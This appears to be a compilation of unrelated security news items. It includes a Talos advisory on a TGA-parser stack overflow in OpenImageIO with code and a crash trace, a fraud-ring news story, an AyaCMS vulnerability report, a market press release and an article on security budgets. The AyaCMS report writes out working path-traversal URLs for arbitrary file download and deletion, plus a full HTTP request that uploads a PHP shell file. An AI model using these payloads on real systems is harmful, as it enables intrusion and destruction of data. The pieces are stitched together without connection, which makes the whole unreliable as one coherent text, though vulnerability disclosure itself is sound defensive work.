A stack-based buffer overflow vulnerability exists in the TGA file format parser of OpenImageIO v2.3.19.0. A specially-crafted targa file can lead to out of bounds read and write on the process stack, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the TGA file format parser of OpenImageIO v2.3.19.0. A specially-crafted targa file can lead to out of bounds read and write on the process stack, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenImageIO Project OpenImageIO v2.3.19.0

**PRODUCT URLS**

OpenImageIO - https://github.com/OpenImageIO/oiio

**CVSSv3 SCORE**

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H AC High because exploitability highly depends on the way the code is compiled Also, it is limited to being only an OOB read in current master branch. (comment: Aleks)  
\##### CWE

CWE-121 - Stack-based Buffer Overflow

**DETAILS**

OpenImageIO is an image processing library with easy-to-use interfaces and a sizable number of supported image formats. Useful for conversion and processing and even image comparison, this library is utilized by 3D-processing software from AliceVision (including Meshroom), as well as Blender for reading Photoshop .psd files.

When reading in Targa (.tga) files, the libOpenImageIO code flows are pretty quick and easy, matching the relative simpleness of the file format itself. Starting with TGAInput::open(const std::stirng &name, ImageSpec& newspec):

    bool
    TGAInput::open(const std::string& name, ImageSpec& newspec)
    {
        m_filename = name;
    
        DBG("TGA opening {}\n", name);
        uint64_t filesize = Filesystem::file_size(name);
        m_file            = Filesystem::fopen(name, "rb");
        if (!m_file) {
            errorf("Could not open file \"%s\"", name);
            return false;
        }
    
        // Due to struct packing, we may get a corrupt header if we just load the
        // struct from file; to address that, read every member individually save
        // some typing. Byte swapping is done automatically. If any fail, the file
        // handle is closed and we return false from open().
        if (!(read(m_tga.idlen) && read(m_tga.cmap_type) && read(m_tga.type)
              && read(m_tga.cmap_first) && read(m_tga.cmap_length)
              && read(m_tga.cmap_size) && read(m_tga.x_origin)
              && read(m_tga.y_origin) && read(m_tga.width) && read(m_tga.height)
              && read(m_tga.bpp) && read(m_tga.attr))) {
            errorfmt("Could not read full header");
            return false;
        }
    

The file is opened and we start reading the appropriate fields into the following struct:

    <(^.^)>#ptype m_tga
    type = struct {
        uint8_t idlen;
        uint8_t cmap_type;
        uint8_t type;
        uint16_t cmap_first;
        uint16_t cmap_length;
        uint8_t cmap_size;
        uint16_t x_origin;
        uint16_t y_origin;
        uint16_t width;
        uint16_t height;
        uint8_t bpp;
        uint8_t attr;
    }
    

Assorted validation on these parameters occurs, but is not really worth delving into. Assuming we pass all the checks, we end up reading the last 26 bytes of the file to see if it’s a TGA 2.0 image, which will require extra parsing:

    // now try and see if it's a TGA 2.0 image
    // TGA 2.0 files are identified by a nifty "TRUEVISION-XFILE.\0" signature
    bool check_for_tga2 = (filesize > 26 + 18);                             // [1]
    if (check_for_tga2 && Filesystem::fseek(m_file, -26, SEEK_END) != 0) {
        errorfmt("Could not seek to find the TGA 2.0 signature.");
        return false;
    }
    if (check_for_tga2 && read(m_foot.ofs_ext) && read(m_foot.ofs_dev)     // [2]
        && fread(&m_foot.signature, sizeof(m_foot.signature), 1)
        && !strncmp(m_foot.signature, "TRUEVISION-XFILE.", 17)) {            // [3]
        //std::cerr << "[tga] this is a TGA 2.0 file\n";
        m_spec.attribute("targa:version", 2);
        m_tga_version = 2;
    
        // read the extension area
        if (!fseek(m_foot.ofs_ext)) {   // [4]
            return false;
        }
    

At \[1\], we make sure we have the required 44 bytes, and assuming so, we read all the fields of the m_foot struct at \[2\]:

    <(^.^)>#ptype m_foot
    type = struct {
        uint32_t ofs_ext;
        uint32_t ofs_dev;
        char signature[18];
    }
    

If the signature is found via the strncmp at \[3\], then we read more specific information after that from the absolute offset into the file given by m_foot.ofs_ext at \[4\]:

        // check if this is a TGA 2.0 extension area
        // according to the 2.0 spec, the size for valid 2.0 files is exactly
        // 495 bytes, and the reader should only read as much as it understands
        // for < 495, we ignore this section of the file altogether
        // for > 495, we only read what we know
        uint16_t s;
        if (!read(s))
            return false;
        //std::cerr << "[tga] extension area size: " << s << "\n";
        if (s >= 495) {                 // [5]
            union { 
                unsigned char c[324];  // so as to accommodate the comments
                uint16_t s[6];
                uint32_t l;
            } buf;
    
            // load image author
            if (!fread(buf.c, 41, 1))
                return false;
            if (buf.c[0])
                m_spec.attribute("Artist", (char*)buf.c); // [6]
    
            // load image comments
            if (!fread(buf.c, 324, 1))     // [7]
                return false;
    

If the size of our extension area is greater than or equal to 495, then we end up hitting the branch at \[5\], where we start reading into the stack-based union buf, which is 324 bytes long. The basic codeflow after this is to just read bytes into the buf union and then call m_spec.attribute to set various attributes of our resultant object (the first example is seen at \[6\]). A clear oversight can be seen on line \[7\] however, as the entirety of the buf buffer is filled up by fread, a function that does not null terminate the end result. If we continue on in TGAinput::open(), we can quickly see an assortment of instances where this causes out-of-bounds stack data to be read:

            // concatenate the lines into a single string
            std::string tmpstr((const char*)buf.c);
            if (buf.c[81]) {
                tmpstr += "\n";
                tmpstr += (const char*)&buf.c[81];
            }
            if (buf.c[162]) {
                tmpstr += "\n";
                tmpstr += (const char*)&buf.c[162];
            }
            if (buf.c[243]) {
                tmpstr += "\n";
                tmpstr += (const char*)&buf.c[243]; 
            }
    

Each of these tmpstr += ... buf.c[] lines will read out of bounds assuming there are no null bytes within the buffer, but we can keep looking to see a more interesting instance:

            // timestamp
            if (!fread(buf.s, 2, 6))
                return false;
            if (buf.s[0] || buf.s[1] || buf.s[2] || buf.s[3] || buf.s[4]
                || buf.s[5]) {
                if (bigendian())
                    swap_endian(&buf.s[0], 6);
                sprintf((char*)&buf.c[12], "%04u:%02u:%02u %02u:%02u:%02u",   
                        buf.s[2], buf.s[0], buf.s[1], buf.s[3], buf.s[4],
                        buf.s[5]);
                m_spec.attribute("DateTime", (char*)&buf.c[12]);
            }
    
            // job name/ID
            if (!fread(buf.c, 41, 1))
                return false;
            if (buf.c[0])
                m_spec.attribute("DocumentName", (char*)buf.c);
    
            // job time
            if (!fread(buf.s, 2, 3))
                return false;
            if (buf.s[0] || buf.s[1] || buf.s[2]) {
                if (bigendian())
                    swap_endian(&buf.s[0], 3);
                sprintf((char*)&buf.c[6], "%u:%02u:%02u", buf.s[0], buf.s[1],  
                        buf.s[2]);
                m_spec.attribute("targa:JobTime", (char*)&buf.c[6]);
            }
    
            // software
            if (!fread(buf.c, 41, 1))       // [8]
                return false;
            uint16_t n;
            char l;
            if (!read(n) || !read(l))
                return false;
            if (buf.c[0]) {
                // tack on the version number and letter
                sprintf((char*)&buf.c[strlen((char*)buf.c)], " %u.%u%c",  // [10]
                        n / 100, n % 100, l != ' ' ? l : 0);
                m_spec.attribute("Software", (char*)buf.c);
            }
    

For each of these code blocks, more bytes are read in from the file and if there are any non-null bytes, a sprintf occurs. But if we look at the block starting at \[8\], we read in 41 new bytes and then use those bytes to formulate a Software attribute at the sprintf at \[10\]. But we can quickly see that the Software write occurs inside buf.c[strlen(buf.c)], which if we’ll remember, is not necessarily null terminated. Thus, the strlen(buf.c) can return a value greater than the size of the temp buf buffer, and the sprintf can out-of-bounds write to other variables in the stack. The exact location is obviously dependent on how the software is compiled, but it could potentially result in code execution.

It should be noted that this vulnerability is only an out-of-bounds read in the current master branch commit, as sprintf(buf[strlen(buf)]) is not used, and so we can only disclose out-of-bounds stack data instead.

**Crash Information**

    =================================================================
    ==507317==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff9574 at pc 0x5555555c4e56 bp 0x7fffffff9070 sp 0x7fffffff8838
    READ of size 82 at 0x7fffffff9574 thread T0
    [Detaching after fork from child process 507321]
        #0 0x5555555c4e55 in strlen (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x70e55) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25)
        #1 0x7ffff7eca987 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14d987) (BuildId: 725ef5da52ee6d881f9024d8238a989903932637)
        #2 0x7ffff35ed433 in OpenImageIO_v2_3::TGAInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_3::ImageSpec&) /oiio/oiio-2.3.19.0-unpatched/src/targa.imageio/targainput.cpp:338:24
        #3 0x7ffff35f8d49 in OpenImageIO_v2_3::TGAInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_3::ImageSpec&, OpenImageIO_v2_3::ImageSpec const&) /oiio/oiio-2.3.19.0-unpatched/src/targa.imageio/targainput.cpp:499:12
        #4 0x7ffff2577669 in OpenImageIO_v2_3::ImageInput::create(OpenImageIO_v2_3::string_view, bool, OpenImageIO_v2_3::ImageSpec const*, OpenImageIO_v2_3::Filesystem::IOProxy*, OpenImageIO_v2_3::string_view) /oiio/oiio-2.3.19.0-unpatched/src/libOpenImageIO/imageioplugin.cpp:758:27
        #5 0x7ffff2456589 in OpenImageIO_v2_3::ImageInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_3::ImageSpec const*, OpenImageIO_v2_3::Filesystem::IOProxy*) /oiio/oiio-2.3.19.0-unpatched/src/libOpenImageIO/imageinput.cpp:105:16
        #6 0x55555566f40f in LLVMFuzzerTestOneInput /oiio/fuzzing/./oiio_harness.cpp:77:16
        #7 0x5555555954e3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x414e3) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25)
        #8 0x55555557f25f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x2b25f) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25)
        #9 0x555555584fb6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x30fb6) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25)
        #10 0x5555555aedd2 in main (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x5add2) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25)
        #11 0x7fffe8b75d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #12 0x7fffe8b75e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #13 0x555555579b24 in _start (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x25b24) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25)
    
    Address 0x7fffffff9574 is located in stack of thread T0 at offset 1236 in frame
        #0 0x7ffff35e171f in OpenImageIO_v2_3::TGAInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_3::ImageSpec&) /oiio/oiio-2.3.19.0-unpatched/src/targa.imageio/targainput.cpp:168
    
      This frame has 45 object(s):
        [32, 48) 'agg.tmp'
        [64, 80) 'agg.tmp10'
        [96, 112) 'agg.tmp13'
        [128, 288) 'ref.tmp' (line 242)
        [352, 360) 'agg.tmp519'
        [384, 400) 'agg.tmp534'
        [416, 432) 'agg.tmp573'
        [448, 464) 'agg.tmp574'
        [480, 736) 'id' (line 272)
        [800, 816) 'agg.tmp605'
        [832, 848) 'agg.tmp606'
        [864, 880) 'agg.tmp678'
        [896, 898) 's' (line 305)
        [912, 1236) 'buf' (line 310)
        [1312, 1328) 'agg.tmp718' <== Memory access at offset 1236 partially underflows this variable
        [1344, 1360) 'agg.tmp719'
        [1376, 1408) 'tmpstr' (line 327)
        [1440, 1441) 'ref.tmp732' (line 327)
        [1456, 1472) 'agg.tmp806'
        [1488, 1504) 'agg.tmp808'
        [1520, 1536) 'agg.tmp939'
        [1552, 1568) 'agg.tmp941'
        [1584, 1600) 'agg.tmp972'
        [1616, 1632) 'agg.tmp974'
        [1648, 1664) 'agg.tmp1051'
        [1680, 1696) 'agg.tmp1053'
        [1712, 1714) 'n' (line 376)
        [1728, 1729) 'l' (line 377)
        [1744, 1760) 'agg.tmp1119'
        [1776, 1792) 'agg.tmp1121'
        [1808, 1824) 'agg.tmp1160'
        [1840, 1844) 'gamma' (line 410)
        [1856, 1872) 'agg.tmp1224'
        [1888, 1904) 'agg.tmp1227'
        [1920, 1936) 'agg.tmp1237'
        [1952, 1968) 'agg.tmp1239'
        [1984, 2016) 'ref.tmp1240' (line 419)
        [2048, 2064) 'agg.tmp1252'
        [2080, 2096) 'agg.tmp1317'
        [2112, 2114) 'res' (line 460)
        [2128, 2144) 'agg.tmp1369'
        [2160, 2176) 'agg.tmp1383'
        [2192, 2208) 'agg.tmp1401'
        [2224, 2240) 'agg.tmp1443'
        [2256, 2272) 'agg.tmp1474'
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/oiio/fuzzing/unpatched_setup/fuzz_oiio.bin+0x70e55) (BuildId: e9d97e110da8ca7129ca0569fb37dfa703dccc25) in strlen
    Shadow bytes around the buggy address:
      0x10007fff7250: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
      0x10007fff7260: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
      0x10007fff7270: f2 f2 f2 f2 f2 f2 f2 f2 00 00 f2 f2 00 00 f2 f2
      0x10007fff7280: 00 00 f2 f2 02 f2 00 00 00 00 00 00 00 00 00 00
      0x10007fff7290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff72a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[04]f2
      0x10007fff72b0: f2 f2 f2 f2 f2 f2 f2 f2 00 00 f2 f2 00 00 f2 f2
      0x10007fff72c0: 00 00 00 00 f2 f2 f2 f2 f8 f2 00 00 f2 f2 00 00
      0x10007fff72d0: f2 f2 00 00 f2 f2 00 00 f2 f2 00 00 f2 f2 00 00
      0x10007fff72e0: f2 f2 00 00 f2 f2 00 00 f2 f2 f8 f2 f8 f2 00 00
      0x10007fff72f0: f2 f2 00 00 f2 f2 00 00 f2 f2 f8 f2 00 00 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==507317==ABORTING
    [Thread 0x7fffe2ff9640 (LWP 507320) exited]
    

**TIMELINE**

2022-10-19 - Initial Vendor Contact  
2022-10-20 - Vendor Disclosure  
2022-12-22 - Public Release

Discovered by Lilith >\_> of Cisco Talos.

CVE-2022-41981: TALOS-2022-1628 || Cisco Talos Intelligence Group

An out of bounds read vulnerability exists in the way OpenImageIO version v2.3.19.0 processes string fields in TIFF image files. A specially-crafted TIFF file can lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-41977: TALOS-2022-1627 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.

CVE-2022-43592: TALOS-2022-1651 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the OpenImageIO::decode_iptc_iim() functionality of OpenImageIO Project OpenImageIO v2.3.19.0. A specially-crafted TIFF file can lead to a disclosure of sensitive information. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-41988: TALOS-2022-1643 || Cisco Talos Intelligence Group

"Largest attack of its kind": A potent Southeast Asian e-commerce fraud ring has declared war on US retailers, targeting billions in goods in just the past month and forcing mules into its scheme.

Fraud rings don't have to fuss with all the mundane details of running a business — the scam _is_ the business.

It's that tidy business model that has enabled a new e-commerce threat group to leave its mark in November with what one researcher calls the largest attack of its kind in the past 20 years.

And they're just getting started.

The particularly prolific Southeast Asian-based e-commerce threat group has been able to build up a sophisticated operation stacked with data science, fraud detection, online payments, and e-commerce expertise that so far has enabled them to rip off an estimated $660 million in stolen laptops, cell phones, computer chips, gaming devices, and more in November, according to a new report from Signifyd researchers.

The threat actors use stolen credentials and account takeover to place orders from unsuspecting consumers' accounts, often using stored payment methods. Then, they re-ship them to Asia for repackaging and resale at a premium. According to a tandem report earlier this month on the ring, the group uses mules to do the dirty work of reshipment, often under duress.

"Additionally, if the MSHT (Modern Slavery & Human Trafficking) connections that have appeared can be confirmed, this fraud ring also manipulates people to coerce them to become part of the attack," according to that analysis, from Chargelytics Consulting.

In all, the group targeted a massive $3.3 billion worth of e-commerce merchandise during November, the busiest shopping month of the year, according Signifyd's team, which has been following the group's illicit activities for more than a year.

**Holiday Season Scam 'War'**

"What was unique about this fraud ring was that they revved up really quickly. They're fast and strong," said Ping Li, Signifyd vice president of risk and chargeback operations at Signifyd, in its report this week. "They probably had been preparing for it for a long time, and then they launched a war just before our holiday season."

Li, who has studied how to stop e-commerce fraud for two decades, ranks this attack as the most dangerous she's ever seen, because of its ability to attempt large numbers of fraudulent transactions per minute, which in one case Signifyd analysts observed kept up for a full day.

"Normally, when we see an attack on one merchant, the attack has its own characteristics. And then you see a very different kind of attack on another merchant," Li said. "But this one is just universal. It's everywhere. This is the first time I have seen an attack of this size and scale in our network."

The scammers are also apparently not concerned about being caught. "They kind of leave their signature," Li said. "They are not really trying to hide. It's like, 'Catch me if you can.'"

**Excellence in E-Commerce Fraud**

Besides the operation being stacked with technology know-how, Michael Pezely, Signifyd's director of risk intelligence, tells Dark Reading that the e-commerce threat group has sheer speed and volume of scam transactions on its side.

"E-commerce orders — particularly at the enterprise level — arrive at dizzying speed," Pezely says. "Signifyd, for instance, processed as much as $42 million an hour in orders during Cyber Week. It would be virtually impossible for a human team to review that volume of orders for signs of fraud."

Pezely added that merchants are on the lookout for goods being shipped to a foreign country, but this group of scammers places orders that appear to originate from the US and ship to US addresses.

"Furthermore, if a merchant is relying on only its own transaction data, there likely will be a lag between the time a fraud attack begins and when it is recognized," Pezely explains. "Without having the benefit of seeing millions of transactions across thousands of merchants, a novel fraud attack might not be in plain sight for some time."

**Automation Is Part of the Answer**

His recommendation to e-commerce security teams is that they need to rely on a combination of automation and machine learning informed by patterns across the broader online retail sector.

"And so, automation is part of the answer — in particular, machine learning solutions that are able to recognize patterns and associate them with known bad actors and bad events, while constantly improving their performance to suppress new attacks," Pezely explains.

He adds, "To be effective, teams also need to rely on large networks of many merchants, which provide the transaction intelligence that allows machine learning models to identify attack patterns at one merchant and adjust protection across the network to avoid losses among other merchants on the network."

Once the models are created, it's up to human expertise to put the data together and create a plan for cyber-defense.

Merchants would do well to get ahead of the threat, given the billions of dollars in goods already in the crosshairs of this lone e-commerce fraud ring, Pezely advises.

"Given that a fraud ring's cost of inventory is zero, there is plenty of room to plot future endeavors," he says.

Inside the Next-Level Fraud Ring Scamming Billions Off Holiday Retailers

AyaCMS 3.1.2 is vulnerable to file deletion via /aya/module/admin/fst_del.inc.php

Vulnerability files: /aya/module/admin/fst\_down.inc.php, /aya/module/admin/fst\_del.inc.php  
Vulnerability description: The check\_path function has flaws in the filtering of parameters passed in by $file. We only need to enter characters other than "./\\" such as aya in the header of the parameter to bypass the detection and download or delete any file in the system.  
1、Arbitrary file download Vulnerability  
  
You can access any file in the system through  
admin.php?action=fst_down&file=aya/table/../../../../../../windows/win.ini  

2、Arbitrary file delete Vulnerability  
  
First I create a file named 111.txt under C:\\Windows  
  
Then the files can be deleted through  
admin.php?action=fst_del&file=aya/../../../../../windows/111.txt&in_ajax=1  
  

3、Arbitrary file upload Vulnerability  

    POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
    Host: xx.xx.xx.xx
    Content-Length: 204
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu
    Content-Disposition: form-data; name="upfile"; filename="shell.php"
    Content-Type: text/plain
    
    <?php phpinfo(); ?>
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu--

CVE-2022-47926: AyaCMS v3.1.2 has  Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS

**SAN FRANCISCO****,** **Dec. 22, 2022** **/PRNewswire/ --** The global passwordless authentication market size is expected to reach USD 55.70 billion by 2030, growing at promising 18.2% CAGR, according to a new report by Grand View Research, Inc. Passwordless authentication is a security procedure that uses unique biological traits of a person to validate their authenticity.

**Key Industry Insights & Findings from the report:**

*   Growing investments in developed countries such as the U.S., Canada, Germany, France, and the U.K. for implementing passwordless authentication technology is a crucial factor driving the growth.
*   Fingerprint recognition and facial recognition provide various benefits. The increased security, accountability, convenience, and their non-transferable nature are crucial drivers for the growth.
*   The surge in e-commerce and internet banking, as well as legislations by various authorities such as central banks mandates large organizations to utilize robust authentication mechanisms to authenticate customers.
*   Multi-factor authentication protects clients from phishing attempts and fraudulent purchases and secures transactions.

Read 117-page market research report, "Passwordless Authentication Market Size, Share & Trends Analysis Report By Component, By Product Type (Facial Recognition, Fingerprint, Iris), By Authentication Type, By Portability, By End-user, By Region, And Segment Forecasts, 2022 - 2030", published by Grand View Research.

**Passwordless Authentication Market Growth & Trends**

The increasing adoption of smartphones and other electronic gadgets is a crucial element driving the biometric authentication market forward. According to a July 2022 Oxford Economics and Samsung study, up to 85% of small and midsize enterprises allow all or most of their staff to use mobile devices for work. Personal laptops and smartphones used by employees might expose a small firm to the dangers of unauthorized access to proprietary data, files, and systems. Such solutions remain the need of the hour and growing focus of many companies around the world.

For instance, in September 2022, AaDya Security, a cyber-security firm, announced the availability of passwordless authentication for Judy, the first all-in-one cybersecurity solution for SMEs. The new security feature protects how small business employees access company resources, mainly when they operate remotely and on mobile phones and personal laptops.

The growing requirement for an additional layer of protection beyond passwords fuels the growth of the passwordless authentication industry. To authenticate identities, fingerprint sensors and smartcards are utilized, and these security points allow for a seamless experience and data flow across locations. Most businesses are using voice biometric authentication in their workplaces for their personnel.

Reduced fraud exposure and lower authentication costs often drive organizations to implement voice biometric technology in their facilities. For instance, in July 2022, Turant Inc., a voice biometric AI firm, launched its cutting-edge AI solution in India. The company seeks to eliminate OTP-related fraud in transactions across use cases across business/industry domains, including e-commerce deliveries, by making it available in all Indian languages and roughly 20,000 dialects.

Furthermore, due to the increasing number of incidences of data theft around the world, passwordless authentication has gained popularity. Data theft issues in devices such as computers, cellphones, and tablets have increased the requirement for protection beyond passwords. fingerprint sensors and facial recognition are ways modern gadgets can be secured to prevent data theft.

For instance, in August 2022, ForgeRock, an international identity and access management software business, established strategic cooperation with Israeli software company Secret Double Octopus. ForgeRock will use SDO technology to provide employees, contractors, and vendors with a unified multi-factor secure experience. ForgeRock Enterprise Connect, the new solution, connects effortlessly with any ForgeRock deployment option, allowing organizations to gain increased security for databases, workstations, VPNs, and servers.

**Passwordless Authentication Market Segmentation**

Grand View Research has segmented the global passwordless authentication market based on component, product type, authentication type, portability, end-user, and region:

**Passwordless Authentication Market - Component Outlook (Revenue, USD Million, 2017 - 2030)**

*   Hardware
*   Software
*   Services

**Passwordless Authentication Market - Product Type Outlook (Revenue, USD Million, 2017 - 2030)**

*   Fingerprint Authentication
*   Palm Recognition
*   Iris Recognition
*   Face Recognition
*   Voice Recognition
*   Smart Card
*   Others

**Passwordless Authentication Market - Type Outlook (Revenue, USD Million, 2017 - 2030)**

*   Single-factor Authentication
*   Multi-factor Authentication

**Passwordless Authentication Market - Portability Outlook (Revenue, USD Million, 2017 - 2030)**

*   Fixed
*   Mobile

**Passwordless Authentication Market - End-user Outlook (Revenue, USD Million, 2017 - 2030)**

*   IT & Telecom
*   Retail
*   Transportation & Logistics
*   Aerospace & Defense
*   BFSI
*   Healthcare
*   Government
*   Others

**Passwordless Authentication Market - Regional Outlook (Revenue, USD Million, 2017 - 2030)**

*   North America

*   U.S.
*   Canada
*   Mexico

*   Europe

*   U.K.
*   Germany
*   France

*   Asia Pacific

*   China
*   India
*   Japan

*   Central & South America

*   Brazil

*   Middle East and Africa (MEA)

**List of Key Players in the Passwordless Authentication Market**

*   ASSA ABLOY
*   DERMALOG Identification Systems GmbH
*   East Shore Technology, LLC
*   Fujitsu
*   HID Global Corporation
*   M2SYS Technology
*   Microsoft
*   NEC Corporation
*   Safran
*   Thales.

**Check out more related studies published by Grand View Research:**

*   Facial Recognition Market **\-** The global facial recognition market size is expected to reach USD 12.11 billion by 2028 according to a new report by Grand View Research, Inc. The market is anticipated to expand at a CAGR of 15.4% from 2021 to 2028. Facial recognition is a contactless biometric solution that is a critical factor contributing the market growth.
*   Multi-factor Authentication Market \- The global multi-factor authentication (MFA) market size is expected to reach USD 17.76 billion by 2025, according to a new study by Grand View Research, Inc., experiencing a CAGR of 15.07% during the forecast period. Increasing implementation of BYOD and cloud-based services across enterprises, along with the growing security regulations and mandates, is benefiting market growth.
*   3D Secure Payment Authentication Market \- The global 3D secure payment authentication market size is expected to reach USD 2.76 billion by 2030, growing at a CAGR of 12.2% from 2022 to 2030, according to a new study conducted by Grand View Research, Inc. The rising demand for e-commerce has augmented the use of Card Not Present (CNP) transactions. As a result of such an increase in CNP transactions, the growth in CNP fraud transactions has been observed over the past few years.

**Browse through Grand View Research's** Next Generation Technologies Industry **Research Reports.**

**About Grand View Research**

Grand View Research, U.S.-based market research and consulting company, provides syndicated as well as customized research reports and consulting services. Registered in California and headquartered in San Francisco, the company comprises over 425 analysts and consultants, adding more than 1200 market research reports to its vast database each year. These reports offer in-depth analysis on 46 industries across 25 major countries worldwide. With the help of an interactive market intelligence platform, Grand View Research Helps Fortune 500 companies and renowned academic institutes understand the global and regional business environment and gauge the opportunities that lie ahead.

Passwordless Authentication Market to Be Worth $55.7 Billion by 2030: Grand View Research, Inc.

With a recession potentially coming, some companies are cutting security teams. But moving more infrastructure to the cloud and reducing the number of vendors through consolidation may be the best ways to prepare.

As economic forecasters and businesses raise expectations of a recession in 2023, information-security budgets will likely be pressured in the coming year, experts tell Dark Reading.

Because of latent demand, the call for cybersecurity workers is in flux. While some companies — Patreon, for example — have laid off their cybersecurity teams, other businesses are pausing hiring, as many have open requisitions for cybersecurity specialists. It would be difficult to fill positions anyway: There are currently only enough cybersecurity workers to fill 65% of positions, according to CyberSeek US.

Instead, security teams will have to make do with what they have going forward. The best way to do that is consolidating vendors to reduce costs, and find ways to bring in managed security service providers (MSSPs) to help with areas in which they lack expertise, says Mike Hamilton, chief information security officer at threat-detection and management firm Critical Insight.

"Enterprises have the ability to hire and maintain large teams, so they will continue to do that, but in the mid-market, IT has just got to suck it up and do more security as part of their job," he says. "That's pretty much they way it is everywhere."

While economists and business leaders do not have a great track record for forecasting recessions, current surveys of sentiment have set historical records for recessionary predictions. The Wall Street Journal's quarterly survey of economists found that 63% expect a recession in the next 12 months, the highest registered negative sentiment from economists in the nation outside of an ongoing recession.

Half of companies are already considering instituting IT technology austerity measures, a share that will likely increase if a recession takes hold. Yet, information security should not relax their defensive vigilance, says Merritt Maxim, vice president and research director at Forrester Research.

"Companies need to be as diligent as before," he says. "Hackers and others are not going to stop doing what they have been doing, because of a recession. That will actually spur more activity."

**Turning to the Cloud to Cut IT Security Costs**

Companies should consider moving more infrastructure to the cloud as an austerity measure, experts say. While US firms have moved less than half (45%) of current infrastructure to cloud services, they expect to have 58% of their applications in the cloud in two years, according to Forrester.

While cloud costs have risen and cloud-native application require a different set of skills to secure, they still cost less than equivalent on-premise technologies, Forrester stated in its "Planning Guide 2023: Security & Risk" report. Based on the costs for maintenance, licensing, upgrades, and other investments, on-premises technology consumes the largest percentage of security costs — 41% for companies spending 20% or less of their IT budget on security.

Other experts also recommended cloud infrastructure as being easier and less costly to secure.

"Budget pressure also poses an opportunity and added incentive to accelerate this transformation rather than continue to execute on previous templates," enterprise software firm SAP stated in its security recommendations for 2023. "The cloud poses new security challenges, but also capabilities to optimize and make use of economies of scale."

**Security Vendor Consolidation Reigns: But It May Not Be a Choice**

Managing the disparate security, compliance, and threat-intelligence systems necessary to have visibility and control in a corporate environment has ballooned in the past decade. The average large company has 75 security solutions, according to Microsoft. Over all businesses, the number is smaller but still large, with 13% of companies having more than 20 vendors, according to Cisco's 2020 CISO Benchmark Study.

No wonder, then, that consolidation has become a major strategy going into 2023, with three-quarters of businesses planning to reduce the number of security vendors on which they rely. And many vendors are leaning into that consolidation strategy, not surprisingly. Microsoft, for example, touts cost savings as one of the benefits of consolidating to a single vendor's products and services, claiming that unifying security, compliance, and identity solutions can save up to 60% in costs.

